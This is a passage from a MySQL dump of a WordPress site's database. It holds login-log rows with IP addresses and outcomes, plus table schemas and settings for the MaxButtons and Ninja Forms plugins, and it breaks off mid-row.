login','2017-10-19 05:05:25','failed','new'),(1829,'195.22.126.98','Login success','2017-10-19 06:56:32','success','new'),(1830,'188.232.63.105','Error in login','2017-10-19 11:15:13','failed','new'),(1831,'195.22.126.98','Login success','2017-10-19 18:30:16','success','new'),(1832,'174.205.19.49','Login success','2017-10-21 16:01:13','success','new'),(1833,'89.28.167.23','Error in login','2017-10-22 04:17:55','failed','new'),(1834,'94.228.207.147','Error in login','2017-10-22 12:20:17','failed','new'),(1835,'85.26.234.86','Error in login','2017-10-22 13:45:00','failed','new'),(1836,'195.22.126.98','Login success','2017-10-22 20:47:43','success','new'),(1837,'77.34.10.29','Error in login','2017-10-22 22:05:47','failed','new'),(1838,'69.143.35.179','Login success','2017-10-23 05:45:03','success','new'),(1839,'2.50.92.249','Login success','2018-11-03 17:49:16','success','new'),(1840,'14.186.168.148','Error in login','2019-04-10 17:57:22','failed','new'),(1841,'217.182.193.240','Error in login','2019-06-02 17:30:14','failed','new'),(1842,'78.142.211.111','Error in login','2019-06-15 15:15:02','failed','new'),(1843,'51.77.150.55','Error in login','2019-06-15 20:12:10','failed','new'),(1844,'188.226.133.180','Error in login','2019-06-16 02:53:36','failed','new'),(1845,'136.243.56.200','Error in login','2020-12-28 10:01:17','failed','new'),(1846,'134.213.27.96','Error in login','2020-12-28 10:01:20','failed','new'),(1847,'138.201.38.133','Error in login','2020-12-28 10:01:22','failed','new'),(1848,'64.91.240.53','Error in login','2021-05-03 11:30:34','failed','new'),(1849,'104.236.53.235','Error in login','2021-05-03 11:30:37','failed','new'),(1850,'206.189.142.236','Error in login','2021-05-03 11:30:41','failed','new');
/*!40000 ALTER TABLE `lwz_login_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_maxbuttons_collections`
--

DROP TABLE IF EXISTS `lwz_maxbuttons_collections`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_maxbuttons_collections` (
  `meta_id` int(11) NOT NULL AUTO_INCREMENT,
  `collection_id` int(11) NOT NULL,
  `collection_key` varchar(255) DEFAULT NULL,
  `collection_value` text,
  PRIMARY KEY (`meta_id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_maxbuttons_collections`
--

LOCK TABLES `lwz_maxbuttons_collections` WRITE;
/*!40000 ALTER TABLE `lwz_maxbuttons_collections` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_maxbuttons_collections` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_maxbuttons_collections_trans`
--

DROP TABLE IF EXISTS `lwz_maxbuttons_collections_trans`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_maxbuttons_collections_trans` (
  `name` varchar(1000) DEFAULT NULL,
  `value` varchar(255) DEFAULT NULL,
  `expire` int(11) DEFAULT NULL
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_maxbuttons_collections_trans`
--

LOCK TABLES `lwz_maxbuttons_collections_trans` WRITE;
/*!40000 ALTER TABLE `lwz_maxbuttons_collections_trans` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_maxbuttons_collections_trans` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_maxbuttonsv3`
--

DROP TABLE IF EXISTS `lwz_maxbuttonsv3`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_maxbuttonsv3` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(100) DEFAULT NULL,
  `status` varchar(10) NOT NULL DEFAULT 'publish',
  `cache` text,
  `basic` text,
  `color` text,
  `dimension` text,
  `border` text,
  `gradient` text,
  `text` text,
  `icon` text,
  `container` text,
  `advanced` text,
  `responsive` text,
  `meta` text,
  `updated` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
  `created` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_maxbuttonsv3`
--

LOCK TABLES `lwz_maxbuttonsv3` WRITE;
/*!40000 ALTER TABLE `lwz_maxbuttonsv3` DISABLE KEYS */;
INSERT INTO `lwz_maxbuttonsv3` VALUES (1,'Youth Coordinator','publish','.maxbutton-1.maxbutton.maxbutton-youth-coordinator{position:relative;text-decoration:none;display:inline-block;border-color:#505ac7;width:160px;height:50px;border-top-left-radius:4px;border-top-right-radius:4px;border-bottom-left-radius:4px;border-bottom-right-radius:4px;border-style:solid;border-width:2px;background-color:rgba(39, 65, 166, 1);-webkit-box-shadow:0px 0px 2px 0px #333;-moz-box-shadow:0px 0px 2px 0px #333;box-shadow:0px 0px 2px 0px #333}.maxbutton-1.maxbutton:hover.maxbutton-youth-coordinator{border-color:#505ac7;background-color:rgba(39, 65, 166, 1);-webkit-box-shadow:0px 0px 2px 0px #333;-moz-box-shadow:0px 0px 2px 0px #333;box-shadow:0px 0px 2px 0px #333}.maxbutton-1.maxbutton.maxbutton-youth-coordinator .mb-text{color:#fff;font-family:Arial;font-size:15px;text-align:center;font-style:normal;font-weight:normal;padding-top:18px;padding-right:0px;padding-bottom:18px;padding-left:0px;line-height:1em;box-sizing:border-box;display:block;background-color:unset}.maxbutton-1.maxbutton:hover.maxbutton-youth-coordinator .mb-text{color:#fff}','{\"name\":\"Youth Coordinator\",\"status\":\"publish\",\"description\":\"\",\"url\":\"\",\"new_window\":\"1\",\"nofollow\":0}','{\"text_color\":\"#ffffff\",\"text_shadow_color\":\"#505ac7\",\"gradient_start_color\":\"#2741a6\",\"gradient_end_color\":\"#505ac7\",\"border_color\":\"#505ac7\",\"box_shadow_color\":\"#333333\",\"text_color_hover\":\"#ffffff\",\"text_shadow_color_hover\":\"#333333\",\"gradient_start_color_hover\":\"#2741a6\",\"gradient_end_color_hover\":\"#ffffff\",\"border_color_hover\":\"#505ac7\",\"box_shadow_color_hover\":\"#333333\",\"icon_color\":\"#ffffff\",\"icon_color_hover\":\"#2b469e\"}','{\"button_width\":160,\"button_height\":50}','{\"radius_top_left\":4,\"radius_top_right\":4,\"radius_bottom_left\":4,\"radius_bottom_right\":4,\"border_style\":\"solid\",\"border_width\":2,\"box_shadow_offset_left\":0,\"box_shadow_offset_top\":0,\"box_shadow_width\":2,\"box_shadow_spread\":0}','{\"gradient_stop\":\"45\",\"gradient_start_opacity\":\"100\",\"gradient_end_opacity\":\"100\",\"gradient_start_opacity_hover\":\"100\",\"gradient_end_opacity_hover\":\"100\",\"use_gradient\":\"0\"}','{\"text\":\"Email Program Coordinator\",\"font\":\"Arial\",\"font_size\":15,\"text_align\":\"center\",\"font_style\":\"normal\",\"font_weight\":\"normal\",\"text_shadow_offset_left\":0,\"text_shadow_offset_top\":0,\"text_shadow_width\":0,\"padding_top\":18,\"padding_right\":0,\"padding_bottom\":18,\"padding_left\":0}',NULL,'{\"container_enabled\":\"0\",\"container_center_div_wrap\":\"0\",\"container_width\":0,\"container_margin_top\":0,\"container_margin_right\":0,\"container_margin_bottom\":0,\"container_margin_left\":0,\"container_alignment\":\"\"}','{\"important_css\":\"0\",\"custom_rel\":\"\",\"extra_classes\":\"\",\"external_css\":\"0\"}','{\"media_query\":[],\"auto_responsive\":0}','{\"created\":1484519121,\"modified\":1484519121,\"user_created\":\"pr@zphiblgz.org\",\"user_modified\":\"pr@zphiblgz.org\",\"created_source\":\"editor\",\"user_edited\":\"true\",\"in_collections\":[],\"is_virtual\":\"\"}','2017-01-15 22:25:21','2017-01-16 05:25:21');
/*!40000 ALTER TABLE `lwz_maxbuttonsv3` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_nf3_action_meta`
--

DROP TABLE IF EXISTS `lwz_nf3_action_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_nf3_action_meta` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `parent_id` int(11) NOT NULL,
  `key` longtext NOT NULL,
  `value` longtext,
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=165 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_nf3_action_meta`
--

LOCK TABLES `lwz_nf3_action_meta` WRITE;
/*!40000 ALTER TABLE `lwz_nf3_action_meta` DISABLE KEYS */;
INSERT INTO `lwz_nf3_action_meta` VALUES (1,1,'label','Store Submission'),(2,1,'objectType','Action'),(3,1,'objectDomain','actions'),(4,1,'editActive',''),(5,1,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(6,1,'payment_gateways',''),(7,1,'payment_total',''),(8,1,'tag',''),(9,1,'to',''),(10,1,'email_subject',''),(11,1,'email_message',''),(12,1,'from_name',''),(13,1,'from_address',''),(14,1,'reply_to',''),(15,1,'email_format','html'),(16,1,'cc',''),(17,1,'bcc',''),(18,1,'attach_csv',''),(19,1,'redirect_url',''),(20,1,'email_message_plain',''),(21,2,'label','Email Confirmation'),(22,2,'to','{field:email}'),(23,2,'subject','This is an email action.'),(24,2,'message','Hello, Ninja Forms!'),(25,2,'objectType','Action'),(26,2,'objectDomain','actions'),(27,2,'editActive',''),(28,2,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:0:{}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(29,2,'payment_gateways',''),(30,2,'payment_total',''),(31,2,'tag',''),(32,2,'email_subject','Submission Confirmation '),(33,2,'email_message','<p>{all_fields_table}<br></p>'),(34,2,'from_name',''),(35,2,'from_address',''),(36,2,'reply_to',''),(37,2,'email_format','html'),(38,2,'cc',''),(39,2,'bcc',''),(40,2,'attach_csv',''),(41,2,'email_message_plain',''),(42,3,'objectType','Action'),(43,3,'objectDomain','actions'),(44,3,'editActive',''),(45,3,'label','Email Notification'),(46,3,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(47,3,'payment_gateways',''),(48,3,'payment_total',''),(49,3,'tag',''),(50,3,'to','{system:admin_email}'),(51,3,'email_subject','New message from {field:name}'),(52,3,'email_message','<p>{field:message}</p><p>-{field:name} ( {field:email} )</p>'),(53,3,'from_name',''),(54,3,'from_address',''),(55,3,'reply_to','{field:email}'),(56,3,'email_format','html'),(57,3,'cc',''),(58,3,'bcc',''),(59,3,'attach_csv','0'),(60,3,'email_message_plain',''),(61,4,'label','Success Message'),(62,4,'message','Thank you {field:name} for filling out my form!'),(63,4,'objectType','Action'),(64,4,'objectDomain','actions'),(65,4,'editActive',''),(66,4,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(67,4,'payment_gateways',''),(68,4,'payment_total',''),(69,4,'tag',''),(70,4,'to',''),(71,4,'email_subject',''),(72,4,'email_message',''),(73,4,'from_name',''),(74,4,'from_address',''),(75,4,'reply_to',''),(76,4,'email_format','html'),(77,4,'cc',''),(78,4,'bcc',''),(79,4,'attach_csv',''),(80,4,'redirect_url',''),(81,4,'success_msg','<p>Form submitted successfully.</p><p>A confirmation email was sent to {field:email}.</p>'),(82,4,'email_message_plain',''),(83,5,'label','Store Submission'),(84,5,'objectType','Action'),(85,5,'objectDomain','actions'),(86,5,'editActive',''),(87,5,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(88,5,'payment_gateways',''),(89,5,'payment_total',''),(90,5,'tag',''),(91,5,'to',''),(92,5,'email_subject',''),(93,5,'email_message',''),(94,5,'from_name',''),(95,5,'from_address',''),(96,5,'reply_to',''),(97,5,'email_format','html'),(98,5,'cc',''),(99,5,'bcc',''),(100,5,'attach_csv',''),(101,5,'redirect_url',''),(102,5,'email_message_plain',''),(103,6,'label','Email Confirmation'),(104,6,'to','{field:email}'),(105,6,'subject','This is an email action.'),(106,6,'message','Hello, Ninja Forms!'),(107,6,'objectType','Action'),(108,6,'objectDomain','actions'),(109,6,'editActive',''),(110,6,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:0:{}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(111,6,'payment_gateways',''),(112,6,'payment_total',''),(113,6,'tag',''),(114,6,'email_subject','Submission Confirmation '),(115,6,'email_message','<p>{all_fields_table}<br></p>'),(116,6,'from_name',''),(117,6,'from_address',''),(118,6,'reply_to',''),(119,6,'email_format','html'),(120,6,'cc',''),(121,6,'bcc',''),(122,6,'attach_csv',''),(123,6,'email_message_plain',''),(124,7,'objectType','Action'),(125,7,'objectDomain','actions'),(126,7,'editActive',''),(127,7,'label','Email Notification'),(128,7,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(129,7,'payment_gateways',''),(130,7,'payment_total',''),(131,7,'tag',''),(132,7,'to','{system:admin_email}'),(133,7,'email_subject','New message from {field:name}'),(134,7,'email_message','<p>{field:message}</p><p>-{field:name} ( {field:email} )</p>'),(135,7,'from_name',''),(136,7,'from_address',''),(137,7,'reply_to','{field:email}'),(138,7,'email_format','html'),(139,7,'cc',''),(140,7,'bcc',''),(141,7,'attach_csv','0'),(142,7,'email_message_plain',''),(143,8,'label','Success Message'),(144,8,'message','Thank you {field:name} for filling out my form!'),(145,8,'objectType','Action'),(146,8,'objectDomain','actions'),(147,8,'editActive',''),(148,8,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(149,8,'payment_gateways',''),(150,8,'payment_total',''),(151,8,'tag',''),(152,8,'to',''),(153,8,'email_subject',''),(154,8,'email_message',''),(155,8,'from_name',''),(156,8,'from_address',''),(157,8,'reply_to',''),(158,8,'email_format','html'),(159,8,'cc',''),(160,8,'bcc',''),(161,8,'attach_csv',''),(162,8,'redirect_url',''),(163,8,'success_msg','<p>Form submitted successfully.</p><p>A confirmation email was sent to {field:email}.</p>'),(164,8,'email_message_plain','');
/*!40000 ALTER TABLE `lwz_nf3_action_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_nf3_actions`
--

DROP TABLE IF EXISTS `lwz_nf3_actions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_nf3_actions` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` longtext,
  `key` longtext,
  `type` longtext,
  `active` tinyint(1) DEFAULT '1',
  `parent_id` int(11) NOT NULL,
  `created_at` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
  `updated_at` datetime DEFAULT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=9 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_nf3_actions`
--

LOCK TABLES `lwz_nf3_actions` WRITE;
/*!40000 ALTER TABLE `lwz_nf3_actions` DISABLE KEYS */;
INSERT INTO `lwz_nf3_actions` VALUES (1,'','','save',1,1,'2017-09-13 13:05:28','2017-09-13 07:05:28'),(2,'','','email',1,1,'2017-09-13 13:05:28','2017-09-13 07:05:28'),(3,'','','email',1,1,'2017-09-13 13:05:28','2017-09-13 07:05:28'),(4,'','','successmessage',1,1,'2017-09-13 13:05:28','2017-09-13 07:05:28'),(5,'','','save',1,2,'2017-09-13 13:17:58','2017-09-13 07:17:58'),(6,'','','email',1,2,'2017-09-13 13:17:58','2017-09-13 07:17:58'),(7,'','','email',1,2,'2017-09-13 13:17:58','2017-09-13 07:17:58'),(8,'','','successmessage',1,2,'2017-09-13 13:17:58','2017-09-13 07:17:58');
/*!40000 ALTER TABLE `lwz_nf3_actions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_nf3_chunks`
--

DROP TABLE IF EXISTS `lwz_nf3_chunks`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_nf3_chunks` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(200) DEFAULT NULL,
  `value` longtext,
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_nf3_chunks`
--

LOCK TABLES `lwz_nf3_chunks` WRITE;
/*!40000 ALTER TABLE `lwz_nf3_chunks` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_nf3_chunks` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_nf3_field_meta`
--

DROP TABLE IF EXISTS `lwz_nf3_field_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_nf3_field_meta` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `parent_id` int(11) NOT NULL,
  `key` longtext NOT NULL,
  `value` longtext,
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=253 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_nf3_field_meta`
--

LOCK TABLES `lwz_nf3_field_meta` WRITE;
/*!40000 ALTER TABLE `lwz_nf3_field_meta` DISABLE KEYS */;
INSERT INTO `lwz_nf3_field_meta` VALUES (1,1,'label_pos','above'),(2,1,'required','1'),(3,1,'order','1'),(4,1,'placeholder',''),(5,1,'default',''),(6,1,'wrapper_class',''),(7,1,'element_class',''),(8,1,'objectType','Field'),(9,1,'objectDomain','fields'),(10,1,'editActive',''),(11,1,'container_class',''),(12,1,'input_limit',''),(13,1,'input_limit_type','characters'),(14,1,'input_limit_msg','Character(s) left'),(15,1,'manual_key',''),(16,1,'disable_input',''),(17,1,'admin_label',''),(18,1,'help_text',''),(19,1,'desc_text',''),(20,1,'disable_browser_autocomplete',''),(21,1,'mask',''),(22,1,'custom_mask',''),(23,1,'wrap_styles_background-color',''),(24,1,'wrap_styles_border',''),(25,1,'wrap_styles_border-style',''),(26,1,'wrap_styles_border-color',''),(27,1,'wrap_styles_color',''),(28,1,'wrap_styles_height',''),(29,1,'wrap_styles_width',''),(30,1,'wrap_styles_font-size',''),(31,1,'wrap_styles_margin',''),(32,1,'wrap_styles_padding',''),(33,1,'wrap_styles_display',''),(34,1,'wrap_styles_float',''),(35,1,'wrap_styles_show_advanced_css','0'),(36,1,'wrap_styles_advanced',''),(37,1,'label_styles_background-color',''),(38,1,'label_styles_border',''),(39,1,'label_styles_border-style',''),(40,1,'label_styles_border-color',''),(41,1,'label_styles_color',''),(42,1,'label_styles_height',''),(43,1,'label_styles_width',''),(44,1,'label_styles_font-size',''),(45,1,'label_styles_margin',''),(46,1,'label_styles_padding',''),(47,1,'label_styles_display',''),(48,1,'label_styles_float',''),(49,1,'label_styles_show_advanced_css','0'),(50,1,'label_styles_advanced',''),(51,1,'element_styles_background-color',''),(52,1,'element_styles_border',''),(53,1,'element_styles_border-style',''),(54,1,'element_styles_border-color',''),(55,1,'element_styles_color',''),(56,1,'element_styles_height',''),(57,1,'element_styles_width',''),(58,1,'element_styles_font-size',''),(59,1,'element_styles_margin',''),(60,1,'element_styles_padding',''),(61,1,'element_styles_display',''),(62,1,'element_styles_float',''),(63,1,'element_styles_show_advanced_css','0'),(64,1,'element_styles_advanced',''),(65,1,'cellcid','c3277'),(66,2,'label_pos','above'),(67,2,'required','1'),(68,2,'order','2'),(69,2,'placeholder',''),(70,2,'default',''),(71,2,'wrapper_class',''),(72,2,'element_class',''),(73,2,'objectType','Field'),(74,2,'objectDomain','fields'),(75,2,'editActive',''),(76,2,'container_class',''),(77,2,'admin_label',''),(78,2,'help_text',''),(79,2,'desc_text',''),(80,2,'wrap_styles_background-color',''),(81,2,'wrap_styles_border',''),(82,2,'wrap_styles_border-style',''),(83,2,'wrap_styles_border-color',''),(84,2,'wrap_styles_color',''),(85,2,'wrap_styles_height',''),(86,2,'wrap_styles_width',''),(87,2,'wrap_styles_font-size',''),(88,2,'wrap_styles_margin',''),(89,2,'wrap_styles_padding',''),(90,2,'wrap_styles_display',''),(91,2,'wrap_styles_float',''),(92,2,'wrap_styles_show_advanced_css','0'),(93,2,'wrap_styles_advanced',''),(94,2,'label_styles_background-color',''),(95,2,'label_styles_border',''),(96,2,'label_styles_border-style',''),(97,2,'label_styles_border-color',''),(98,2,'label_styles_color',''),(99,2,'label_styles_height',''),(100,2,'label_styles_width',''),(101,2,'label_styles_font-size',''),(102,2,'label_styles_margin',''),(103,2,'label_styles_padding',''),(104,2,'label_styles_display',''),(105,2,'label_styles_float',''),(106,2,'label_styles_show_advanced_css','0'),(107,2,'label_styles_advanced',''),(108,2,'element_styles_background-color',''),(109,2,'element_styles_border',''),(110,2,'element_styles_border-style',''),(111,2,'element_styles_border-color',''),(112,2,'element_styles_color',''),(113,2,'element_styles_height',''),(114,2,'element_styles_width',''),(115,2,'element_styles_font-size',''),(116,2,'element_styles_margin',''),(117,2,'element_styles_padding',''),(118,2,'element_styles_display',''),(119,2,'element_styles_float',''),(120,2,'element_styles_show_advanced_css','0'),(121,2,'element_styles_advanced',''),(122,2,'cellcid','c3281'),(123,3,'label_pos','above'),(124,3,'required','1'),(125,3,'order','3'),(126,3,'placeholder',''),(127,3,'default',''),(128,3,'wrapper_class',''),(129,3,'element_class',''),(130,3,'objectType','Field'),(131,3,'objectDomain','fields'),(132,3,'editActive',''),(133,3,'container_class',''),(134,3,'input_limit',''),(135,3,'input_limit_type','characters'),(136,3,'input_limit_msg','Character(s) left'),(137,3,'manual_key',''),(138,3,'disable_input',''),(139,3,'admin_label',''),(140,3,'help_text',''),(141,3,'desc_text',''),(142,3,'disable_browser_autocomplete',''),(143,3,'textarea_rte',''),(144,3,'disable_rte_mobile',''),(145,3,'textarea_media',''),(146,3,'wrap_styles_background-color',''),(147,3,'wrap_styles_border',''),(148,3,'wrap_styles_border-style',''),(149,3,'wrap_styles_border-color',''),(150,3,'wrap_styles_color',''),(151,3,'wrap_styles_height',''),(152,3,'wrap_styles_width',''),(153,3,'wrap_styles_font-size',''),(154,3,'wrap_styles_margin',''),(155,3,'wrap_styles_padding',''),(156,3,'wrap_styles_display',''),(157,3,'wrap_styles_float',''),(158,3,'wrap_styles_show_advanced_css','0'),(159,3,'wrap_styles_advanced',''),(160,3,'label_styles_background-color',''),(161,3,'label_styles_border',''),(162,3,'label_styles_border-style',''),(163,3,'label_styles_border-color',''),(164,3,'label_styles_color',''),(165,3,'label_styles_height',''),(166,3,'label_styles_width',''),(167,3,'label_styles_font-size',''),(168,3,'label_styles_margin',''),(169,3,'label_styles_padding',''),(170,3,'label_styles_display',''),(171,3,'label_styles_float',''),(172,3,'label_styles_show_advanced_css','0'),(173,3,'label_styles_advanced',''),(174,3,'element_styles_background-color',''),(175,3,'element_styles_border',''),(176,3,'element_styles_border-style',''),(177,3,'element_styles_border-color',''),(178,3,'element_styles_color',''),(179,3,'element_styles_height',''),(180,3,'element_styles_width',''),(181,3,'element_styles_font-size',''),(182,3,'element_styles_margin',''),(183,3,'element_styles_padding',''),(184,3,'element_styles_display',''),(185,3,'element_styles_float',''),(186,3,'element_styles_show_advanced_css','0'),(187,3,'element_styles_advanced',''),(188,3,'cellcid','c3284'),(189,4,'processing_label','Processing'),(190,4,'order','5'),(191,4,'objectType','Field'),(192,4,'objectDomain','fields'),(193,4,'editActive',''),(194,4,'container_class',''),(195,4,'element_class',''),(196,4,'wrap_styles_background-color',''),(197,4,'wrap_styles_border',''),(198,4,'wrap_styles_border-style',''),(199,4,'wrap_styles_border-color',''),(200,4,'wrap_styles_color',''),(201,4,'wrap_styles_height',''),(202,4,'wrap_styles_width',''),(203,4,'wrap_styles_font-size',''),(204,4,'wrap_styles_margin',''),(205,4,'wrap_styles_padding',''),(206,4,'wrap_styles_display',''),(207,4,'wrap_styles_float',''),(208,4,'wrap_styles_show_advanced_css','0'),(209,4,'wrap_styles_advanced',''),(210,4,'label_styles_background-color',''),(211,4,'label_styles_border',''),(212,4,'label_styles_border-style',''),(213,4,'label_styles_border-color',''),(214,4,'label_styles_color',''),(215,4,'label_styles_height',''),(216,4,'label_styles_width',''),(217,4,'label_styles_font-size',''),(218,4,'label_styles_margin',''),(219,4,'label_styles_padding',''),(220,4,'label_styles_display',''),(221,4,'label_styles_float',''),(222,4,'label_styles_show_advanced_css','0'),(223,4,'label_styles_advanced',''),(224,4,'element_styles_background-color',''),(225,4,'element_styles_border',''),(226,4,'element_styles_border-style',''),(227,4,'element_styles_border-color',''),(228,4,'element_styles_color',''),(229,4,'element_styles_height',''),(230,4,'element_styles_width',''),(231,4,'element_styles_font-size',''),(232,4,'element_styles_margin',''),(233,4,'element_styles_padding',''),(234,4,'element_styles_display',''),(235,4,'element_styles_float',''),(236,4,'element_styles_show_advanced_css','0'),(237,4,'element_styles_advanced',''),(238,4,'submit_element_hover_styles_background-color',''),(239,4,'submit_element_hover_styles_border',''),(240,4,'submit_element_hover_styles_border-style',''),(241,4,'submit_element_hover_styles_border-color',''),(242,4,'submit_element_hover_styles_color',''),(243,4,'submit_element_hover_styles_height',''),(244,4,'submit_element_hover_styles_width',''),(245,4,'submit_element_hover_styles_font-size',''),(246,4,'submit_element_hover_